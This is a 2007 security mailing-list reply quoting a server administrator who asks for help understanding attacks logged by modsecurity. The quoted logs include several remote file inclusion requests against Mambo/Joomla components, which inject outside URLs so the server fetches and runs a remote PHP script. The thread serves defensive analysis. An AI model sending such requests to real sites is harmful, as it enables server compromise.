mailing list archives
RE: PHP web exploit/vulnerability
From: David Gutierrez <davegu1 () hotmail com>
Date: Tue, 23 Oct 2007 12:16:54 -0500
Feel free to post it or send me a copy via email.
----------------------------------------> Date: Tue, 23 Oct 2007 11:29:47 -0500> From: colea () sunset com mx> To:
security-basics () securityfocus com> Subject: PHP web exploit/vulnerability>> Hello everyone,>> I'm sorry if this is a
stupid question, but I just wanted your input,> maybe direct me to some links, another mail list, or whatever you
might> add would be highly appreciated; we have modsecurity installed on our> server, and it has been logging many
attacks like the following:>> GET>
/content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti> \> ngen.de/admin/ec.txt?
HTTP/1.1>> GET> /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%> \>
20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1>> GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1>> I
managed to get a copy of the php script which these attacks try to> force the server to execute, I could post it here
if that is correct and> anybody could take a look at it and help me out a little to understand> what it's trying to
do.>> Any help is appreciated, thanks in advance.>> Camilo Olea>>>
Windows Live Hotmail and Microsoft Office Outlook – together at last. Get it now.